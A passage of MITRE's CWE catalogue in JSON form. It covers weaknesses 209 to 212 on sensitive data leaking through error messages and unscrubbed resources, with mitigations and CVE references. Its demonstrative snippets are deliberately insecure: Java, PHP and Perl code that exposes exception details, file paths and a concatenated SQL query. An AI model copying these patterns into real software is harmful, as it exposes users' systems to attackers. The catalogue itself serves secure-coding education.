query."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["self-generated: the source code explicitly constructs the error message and delivers it","externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Name":"Java","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"System Configuration"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Often this will either reveal sensitive information which may be used for a later attack or private information stored in the server."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness generally requires domain-specific interpretation using manual analysis. However, the number of potential error conditions may be too large to cover completely within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated methods may be able to detect certain idioms automatically, such as exposed stack traces or pathnames, but violation of business rules or privacy requirements is not typically feasible.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Error conditions may be triggered with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"System Configuration","Description":"Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function."},{"Phase":"System Configuration","Description":"Create default error pages or messages that do not leak any information."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, sensitive information might be printed depending on the exception that occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"/.../","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem."},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e-&gt;getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"Intro_Text":"The following code generates an error message that leaks the full pathname of the configuration file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ConfigDir = \\"/home/myprog/config\\";$uname = GetUserInput(\\"username\\");ExitError(\\"Bad hacker!\\") if ($uname !~ /^\\\\w+$/);$file = \\"$ConfigDir/$uname.txt\\";if (! (-e $file)) {}...","xhtml:br":["","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":{"#text":"ExitError(\\"Error: $file does not exist\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-1579","Description":"Existence of user names can be determined by requesting a nonexistent blog and reading the error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1579"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2008-3060","Description":"Malformed input to login page causes leak of full path when IMAP call fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3060"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through error messages"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"215"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"54"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-174"}},{"attr":{"@_External_Reference_ID":"REF-175","@_Section":"Section 9.2, Page 326"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 16, &#34;General Good Practices.&#34; Page 415"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}},{"attr":{"@_External_Reference_ID":"REF-179"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Overly Verbose Error Messages&#34;, Page 75"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Error Message Information Leaks","attr":{"@_Date":"2009-01-12"}},{"#text":"Error Message Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an Error Message","attr":{"@_Date":"2020-02-24"}}]}},"210":{"attr":{"@_ID":"210","@_Name":"Self-generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software identifies an error condition and creates its own diagnostic or error messages that contain sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses custom configuration files for each user in the application. It checks to see if the file exists on the system before attempting to open and use the file. If the configuration file does not exist, then an error is generated, and the application exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$uname = GetUserInput(\\"username\\");if ($uname !~ /^\\\\w+$/){}$filename = \\"/home/myprog/config/\\" . $uname . \\".txt\\";if (!(-e $filename)){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":[{"#text":"ExitError(\\"Bad hacker!\\") ;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Error: $filename does not exist\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that is not associated with a configuration file, an attacker could get this pathname from the error message. It could then be used to exploit path traversal, symbolic link following, or other problems that may exist elsewhere in the application."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1745","Description":"Infoleak of sensitive information in error message (physical access required).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1745"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-Generated Error Message Infoleak"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Overly Verbose Error Messages&#34;, Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Product-Generated Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Generated Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Self-generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"211":{"attr":{"@_ID":"211","@_Name":"Externally-Generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the application, such as an error generated by the programming language interpreter that the software uses. The error can contain sensitive system information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"PHP applications are often targeted for having this issue when the PHP interpreter generates the error outside of the application\'s control. However, other languages/environments exhibit the same issue."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Configure the application\'s environment in a way that prevents errors from being generated. For example, in PHP, disable display_errors."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user. Create default error pages if necessary."},{"Phase":"Implementation","Description":"The best way to prevent this weakness during implementation is to avoid any bugs that could trigger the external error message. This typically happens when the program encounters fatal errors, such as a divide-by-zero. You will not always be able to control the use of error pages, and you might not be using a language that handles exceptions."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1581","Description":"chain: product does not protect against direct request of an include file, leading to resultant path disclosure when the include file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1581"},{"Reference":"CVE-2004-1579","Description":"Single \\"\'\\" inserted into SQL query leads to invalid SQL query execution, triggering full path disclosure. Possibly resultant from more general SQL injection issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1579"},{"Reference":"CVE-2005-0459","Description":"chain: product does not protect against direct request of a library file, leading to resultant path disclosure when the file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0459"},{"Reference":"CVE-2005-0443","Description":"invalid parameter triggers a failure to find an include file, leading to infoleak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0443"},{"Reference":"CVE-2005-0433","Description":"Various invalid requests lead to information leak in verbose error messages describing the failure to instantiate a class, open a configuration file, or execute an undefined function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0433"},{"Reference":"CVE-2004-1101","Description":"Improper handling of filename request with trailing \\"/\\" causes multiple consequences, including information leak in Visual Basic error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1101"}]},"Functional_Areas":{"Functional_Area":"Error Handling"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-External Error Message Infoleak"}},"Notes":{"Note":{"#text":"This is inherently a resultant vulnerability from a weakness within the product or an interaction error.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Functional_Areas, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Product-External Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through External Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Externally-Generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"212":{"attr":{"@_ID":"212","@_Name":"Improper Removal of Sensitive Information Before Storage or Transfer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.","Extended_Description":{"xhtml:p":["Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing.","For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface 